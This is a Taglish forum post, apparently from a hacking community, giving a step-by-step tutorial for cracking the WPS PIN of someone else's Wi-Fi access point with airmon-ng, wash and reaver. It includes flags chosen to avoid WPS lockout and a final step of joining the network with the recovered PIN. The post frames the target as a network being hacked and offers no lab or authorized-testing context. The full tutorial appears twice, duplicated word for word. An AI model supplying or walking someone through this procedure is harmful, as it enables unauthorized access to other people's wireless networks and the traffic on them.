Eto na pala Solusyon para hindi mag-WPS Lockout yung Target AP na hinahack nyu...Complete Tut na para marami makinabang,...
Step1: iwconfig >> check mo muna inteface name ng Adapter at kung nasa Monitor Mode na ito...
Step2: airmon-ng start wlan1 >> put wifi adapter in Monitor mode ( note change wlan1 into ur interface name)
Step3: kill 1156 >> (Optional) kill mo yung mag interfering process kung merong sagabal (1156 for example sa ken etc. lahat dapat patayin)
Step4 airmon-ng start wlan1 >> pagahin ulet si airmon-ng para makita yung interface name nya in monitor mode (ex. saken wlan1mon )
Step5: wash -i wlan1mon >> para ma-filter lang yung Target AP na may WPS (Note: paltan yung wlan1mon sa interface name mo. Ex. mon0 etc..)
Step6: CTRL+C pag nakita muna na Target AP mo ( Note: wag na tirahin yung AP na may column Lck : Yes.. mahihirpan ka)
Step7: Open New Terminal reaver -i wlan1mon -c 1 -b 90:61:0C:2E:A7:CE -vv -L -N -d 15 -T .5 -r 3:15 at paganahin si reaver
legend:
wlan1mon is the name of the wireless adapter in monitor mode.
--b 90:61:0C:2E:A7:CE is the BSSID of the vulnerable AP.
-c 1 is the channel the of theTarget AP.
-L Ignore locked WPS state.
-N Don’t send NACK packets when errors are detected.
-d 15 Delay 15 seconds between PIN attempts.
-T Set timeout period to half a second.
-r 3:15 After 3 attempts, sleep for 15 seconds
Within 10-20 minutes...lalabas na WPS PIN kung tama lahat code mo..TIYAGA lang dapat mga TS
Managed mo na ulet WIFI para maka-net ka sa KALI LINUX:
sudo service network-manager restart
airmon-ng stop wlan1mon (Note: paltan yung wlan1mon sa interface name mo)
dito mo i-enter yung nakuha mong WPS PIN (see Image) at kung wala kang ganyan pwede yung JUMPSTART sa Windows.
basa ka na sa comment ko d2 (complete TUT yan)
Step1: iwconfig >> check mo muna inteface name ng Adapter at kung nasa Monitor Mode na ito...
Step2: airmon-ng start wlan1 >> put wifi adapter in Monitor mode ( note change wlan1 into ur interface name)
Step3: kill 1156 >> (Optional) kill mo yung mag interfering process kung merong sagabal (1156 for example sa ken etc. lahat dapat patayin)
Step4 airmon-ng start wlan1 >> pagahin ulet si airmon-ng para makita yung interface name nya in monitor mode (ex. saken wlan1mon )
Step5: wash -i wlan1mon >> para ma-filter lang yung Target AP na may WPS (Note: paltan yung wlan1mon sa interface name mo. Ex. mon0 etc..)
Step6: CTRL+C pag nakita muna na Target AP mo ( Note: wag na tirahin yung AP na may column Lck : Yes.. mahihirpan ka)
Step7: Open New Terminal reaver -i wlan1mon -c 1 -b 90:61:0C:2E:A7:CE -vv -L -N -d 15 -T .5 -r 3:15 at paganahin si reaver
legend:
wlan1mon is the name of the wireless adapter in monitor mode.
--b 90:61:0C:2E:A7:CE is the BSSID of the vulnerable AP.
-c 1 is the channel the of theTarget AP.
-L Ignore locked WPS state.
-N Don’t send NACK packets when errors are detected.
-d 15 Delay 15 seconds between PIN attempts.
-T Set timeout period to half a second.
-r 3:15 After 3 attempts, sleep for 15 seconds
Within 10-20 minutes...lalabas na WPS PIN kung tama lahat code mo..TIYAGA lang dapat mga TS
Managed mo na ulet WIFI para maka-net ka sa KALI LINUX:
sudo service network-manager restart
airmon-ng stop wlan1mon (Note: paltan yung wlan1mon sa interface name mo)
dito mo i-enter yung nakuha mong WPS PIN (see Image) at kung wala kang ganyan pwede yung JUMPSTART sa Windows.
basa ka na sa comment ko d2 (complete TUT yan)
Last edited: